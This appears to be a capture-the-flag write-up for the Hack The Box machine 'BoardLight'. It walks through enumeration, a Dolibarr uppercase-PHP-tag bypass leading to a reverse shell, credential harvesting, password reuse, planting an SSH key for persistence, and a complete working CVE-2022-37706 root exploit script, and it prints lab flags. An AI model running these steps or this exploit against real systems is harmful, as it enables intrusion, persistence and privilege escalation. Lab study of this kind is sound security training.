
Nmap Results
target="10.129.139.70"
sudo nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt $target# Nmap 7.94SVN scan initiated Tue May 28 16:37:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.139.70
Nmap scan report for 10.129.139.70
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 28 16:38:20 2024 -- 1 IP address (1 host up) scanned in 42.58 secondsService Enumeration
TCP/80


board.htb on the page, so let's add it to our hosts fileecho -e '10.129.139.70\tboard.htb' | sudo tee -a /etc/hosts

Gobuster Enumeration
Directories and Files
gobuster dir -u http://board.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt -t 100 -o gobuster_80.txt/about.php (Status: 200) [Size: 9100]
/css (Status: 301) [Size: 304] [--> http://board.htb/css/]
/do.php (Status: 200) [Size: 9209]
/images (Status: 301) [Size: 307] [--> http://board.htb/images/]
/index.php (Status: 200) [Size: 15949]
/js (Status: 301) [Size: 303] [--> http://board.htb/js/]Nothing new discovered here
Virtual Hosts
# --domain : base domain of the target
# --append-domain : append the base domain on the end of ever wordlist item
# -w : the wordlist to use
# -t : how many concurrent threads
# --delay : add a brief delay between requests to go easy on the server
# --exclude-length : the server responds with a lenth of 301 for invalid names
gobuster vhost -k --domain board.htb --append-domain -u http://10.129.139.70 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 --delay 10ms --exclude-length 301Found: crm.board.htb Status: 200 [Size: 6360]echo -e '10.129.139.70\tcrm.board.htb' | sudo tee -a /etc/hosts

CRM Enumeration

Filter results, such that we don't include any HTB user content



Recall from before that we saw an email of info@board.htb, so that is one possible credential for the CRM. However, I did find that admin:admin allows us to login as well.

Testing the Exploit
admin user has the ability to create and edit sites and pages. The premise of the vulnerability is that the application attempts to block an unprivileged user from running PHP scripts by blocking <?php in the site source code. However, we can bypass the PHP code restriction by simply specifying a <?PHP uppercase tag.
Websites and click the + button to add a website
Create
+ to add a Page
Create
Edit HTML Source
<?php
<?PHP


phpinfo() function executes as expectedExploit
Reverse Shell
wget https://github.com/pentestmonkey/php-reverse-shell/raw/master/php-reverse-shell.php -O sh.phpnano sh.php
1 with the uppercase PHP
49 and 50 with our listener IP and port
sudo rlwrap nc -lnvp 443

Post-Exploit Enumeration
Operating Environment
OS & Kernel
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Current User
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Sorry, user www-data may not run sudo on localhost.
Users and Groups
Local Users
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
Local Groups
adm:x:4:syslog,larissa
larissa:x:1000:
Network Configurations
Network Interfaces
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:b9:89 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.32.44/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3421sec preferred_lft 3421sec
inet6 dead:beef::250:56ff:feb0:b989/64 scope global dynamic mngtmpaddr
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:feb0:b989/64 scope link
valid_lft forever preferred_lft forever
Open Ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
Interesting Files
/var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
Privilege Escalation
Dump the Database
During the post-exploit information we found the database credential for the dolibarr user in one of the configuration files.


dolibarr database and list tables
lx_user table
admin password, let's try and crack SuperAdminLateral to Larissa
su larissaTest for password reuse

Create a SSH Key File for Persistence
ssh-keygen -t rsa -b 4096 -C '' -N ''Run on Kali to generate a SSH key pair
cat id_rsa.pubCopy the public key string to your clipboard
echo '... public key string here ...' > /home/larissa/.ssh/authorized_keysAdd your SSH public key to Larissa's authorized keys file
ssh -i id_rsa larissa@board.htbNow, use your private key back on Kali to log in over SSH

Escalate to Root
find / -perm /4000 2>/dev/nullList SUID binaries as part of post-exploit enumeration
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
I'm not familiar with these SUID binaries, but they are owned by root, research time

Search Google for privilege escalation using this SUID binary


Exploitation
The vulnerability occurs due to the way the enlightment_sys component handles paths that start with /dev/.. as this will cause a path traversal back to system root and allow a malicious user to exploit a program in a writable path somewhere below the root / directory.
nano /tmp/pwn.sh#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///netbash /tmp/pwn.sh
Flags
User
b3e9e7d4e2f3671c35e6a49e2440fb98
Root
648dd6401e5ae0d7122776b67fed5724
